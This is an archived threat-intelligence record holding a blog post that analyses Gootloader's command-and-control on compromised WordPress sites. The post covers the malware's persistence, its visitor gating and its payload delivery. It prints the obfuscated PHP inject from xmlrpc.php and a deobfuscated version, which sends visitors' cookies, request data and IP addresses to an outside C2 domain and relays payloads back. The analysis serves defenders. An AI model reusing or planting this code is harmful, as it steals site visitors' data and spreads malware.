{
	"id": "6e99a0bc-8cd5-4499-afb6-7ba9e653d669",
	"created_at": "2026-04-06T00:10:15.561241Z",
	"updated_at": "2026-04-10T13:11:38.01553Z",
	"deleted_at": null,
	"sha1_hash": "98d6c7ac309f592cd71a55ead9123b98758ba3b1",
	"title": "Gootloader Command \u0026 Control",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 648874,
	"plain_text": "Gootloader Command \u0026 Control\r\nBy gootloadersites\r\nPublished: 2023-01-05 · Archived: 2026-04-05 23:35:51 UTC\r\nIn the previous blog post, What is Gootloader?, it was mentioned that Gootloader utilizes compromised WordPress sites. How these blogs are compromised is still a mystery, but the belief is that it is either weak administrator credentials or vulnerabilities in the WordPress software (including themes and plugins).\r\nGootloader maintains persistence on a blog by adding PHP code to various files, typically in the themes directory, but it has also been seen in the plugins directory. Additionally, base64-encoded PHP code is stored in the “wp_options” table; this combination allows them to remotely run PHP code.\r\nThis is not an advertisement for the WordPress plugin Wordfence, but it detects the malicious modifications of the files:\r\nThe mechanism of redrawing the forum page is triggered via WordPress filters and actions. It is triggered if the following conditions are met:\r\nThe visitor isn’t logged into the blog\r\nThe visitor’s class C subnet hasn’t visited the blog in the last 24 hours\r\nThe visitor is visiting from an English-speaking country (or French/Korean for the appropriate term)\r\nThe visitor is on a Windows machine\r\nThe visitor is not a crawler (for Google or Bing)\r\nIf the above checks pass, the call out to the “mothership” my-game.biz/5.8.18.7 will cause the page to redraw to the forum image, as seen below:\r\nhttps://gootloader.wordpress.com/2023/01/05/gootloader-command-control/\r\nPage 1 of 4\n\nWhen the user clicks the link, it redirects to another Gootloader compromised WordPress site, with the URL ending in download.php (current as of 5Jan2023). This filename has changed over the years from content.php, search.php, mail.php, faq.php, news.php, and blog.php, but the code has stayed the same. 
No matter the name of the file, it reaches out to my-game.biz/5.8.18.7 for the malicious zipped .JS file.\r\nRecently, the PowerShell code that runs via the scheduled task calls out to 10 domains, some of which appear to be false positives. The URLs always end in xmlrpc.php, which is a legitimate WordPress file. However, they have modified it to include their obfuscated code (see below).\r\n\u003c?php goto boRJO; boRJO: $ch = curl_init(); goto fB1wY; jUCyr: curl_setopt( $ch , CURLOPT_POST, TRUE); goto Hcx\r\ncurl_close( $ch ); goto bi3Dv; HcxAz: curl_setopt( $ch , CURLOPT_RETURNTRANSFER, TRUE); goto b2dAn; N9o8z: $d =\r\n=\u003e serialize( $_SERVER [ \"\\122\\x45\\115\\117\\x54\\x45\\x5f\\x41\\x44\\x44\\122\" ]), \"\\x75\" =\u003e\r\nserialize( $_SERVER [ \"\\x48\\124\\124\\120\\137\\x55\\123\\105\\122\\x5f\\x41\\107\\105\\116\\124\" ]), \"\\x68\" =\u003e\r\nserialize( $_SERVER [ \"\\110\\124\\x54\\x50\\137\\110\\117\\123\\x54\" ]), \"\\x63\" =\u003e serialize( $_COOKIE ), \"\\147\" =\u003e seriali\r\n\"\\160\" =\u003e serialize( $_POST )); goto nLmfD; H36HP: curl_setopt( $ch , CURLOPT_SSL_VERIFYPEER, FALSE); goto N9o8z; b\r\n( strpos ( $r , \"\\x47\\111\\106\\70\\71\" ) !== false) {\r\nheader( \"\\x43\\157\\x6e\\x74\\145\\x6e\\164\\55\\124\\x79\\160\\x65\\x3a\\x20\\151\\x6d\\141\\x67\\x65\\57\\x67\\x69\\146\" ); echo $r ; exit\r\ncmXKz; b2dAn: curl_setopt( $ch , CURLOPT_SSL_VERIFYHOST, 0); goto H36HP; fB1wY: curl_setopt( $ch , CURLOPT_URL,\r\n\"\\150\\164\\164\\x70\\163\\x3a\\x2f\\57\\x77\\x77\\x77\\56\\x69\\x6e\\x65\\x72\\x69\\156\\157\\56\\143\\157\\x2e\\x7a\\141\\x2f\\151\\x6e\\144\\x65\\x78\\x2e\\\r\ngoto jUCyr; LTTGw: $r = curl_exec( $ch ); goto IKqv7; nLmfD: curl_setopt( $ch , CURLOPT_POSTFIELDS, http_build_quer\r\ngoto LTTGw; cmXKz: ?\u003e\r\nHere is the code deobfuscated:\r\n\u003c?php\r\n$d = array (\r\n\"i\" =\u003e serialize( $_SERVER [ \"REMOTE_ADDR\" ]) ,\r\n\"u\" =\u003e serialize( $_SERVER [ 
\"HTTP_USER_AGENT\" ]) ,\r\n\"h\" =\u003e serialize( $_SERVER [ \"HTTP_HOST\" ]) ,\r\n\"c\" =\u003e serialize( $_COOKIE ) ,\r\n\"g\" =\u003e serialize( $_GET ) ,\r\n\"p\" =\u003e serialize( $_POST )\r\n);\r\n$ch = curl_init();\r\ncurl_setopt( $ch , CURLOPT_POST, true);\r\ncurl_setopt( $ch , CURLOPT_RETURNTRANSFER, true);\r\ncurl_setopt( $ch , CURLOPT_SSL_VERIFYPEER, false);\r\ncurl_setopt( $ch , CURLOPT_URL, https:\r\ncurl_setopt( $ch , CURLOPT_SSL_VERIFYHOST, 0);\r\ncurl_setopt( $ch , CURLOPT_POSTFIELDS, http_build_query( $d ));\r\n$r = curl_exec( $ch );\r\ncurl_close( $ch );\r\nif ( strpos ( $r , \"GIF89\" ) !== false)\r\n{\r\nheader( \"Content-Type: image/gif\" );\r\necho $r ;\r\nexit ;\r\n}\r\n?\u003e\r\nBasically, what happens above is that an infected host will send a GET request with cookies full of juicy tidbits about the machine to the xmlrpc.php, which will forward it on to the inerino.co.za domain.\r\nUpdate: If the Gootloader operator decides to send code back, it will be returned as a GIF with obfuscated PowerShell code embedded in it.\r\nUpdate 2: Given that GootLoader inserts the injected PHP block at the start of the xmlrpc.php file and the PHP inject only exits PHP execution when the gating check is passed on inerino[.]co[.]za, execution of xmlrpc.php will simply fall out of the injected GootLoader PHP block and continue execution of the legitimate XML-RPC PHP when the gating check fails. 
This means that a GET request to a GootLoader xmlrpc.php URL that fails the gating check will behave exactly like a GET request to an uninfected xmlrpc.php URL, making it difficult to tell false positive URLs from true positives.\r\nThis is not an advertisement for the WordPress plugin Wordfence, but it detects the malicious modified xmlrpc.php as seen below:\r\nThis inerino.co.za domain is new to Gootloader C2 and came about around 17 November 2022. The domain is registered to Ivan Boldirev, who was a Serbian Canadian hockey player. The SSL cert was generated around 17 October 2022.\r\nSource: https://gootloader.wordpress.com/2023/01/05/gootloader-command-control/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://gootloader.wordpress.com/2023/01/05/gootloader-command-control/"
	],
	"report_names": [
		"gootloader-command-control"
	],
	"threat_actors": [],
	"ts_created_at": 1775434215,
	"ts_updated_at": 1775826698,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/98d6c7ac309f592cd71a55ead9123b98758ba3b1.pdf",
		"text": "https://archive.orkl.eu/98d6c7ac309f592cd71a55ead9123b98758ba3b1.txt",
		"img": "https://archive.orkl.eu/98d6c7ac309f592cd71a55ead9123b98758ba3b1.jpg"
	}
}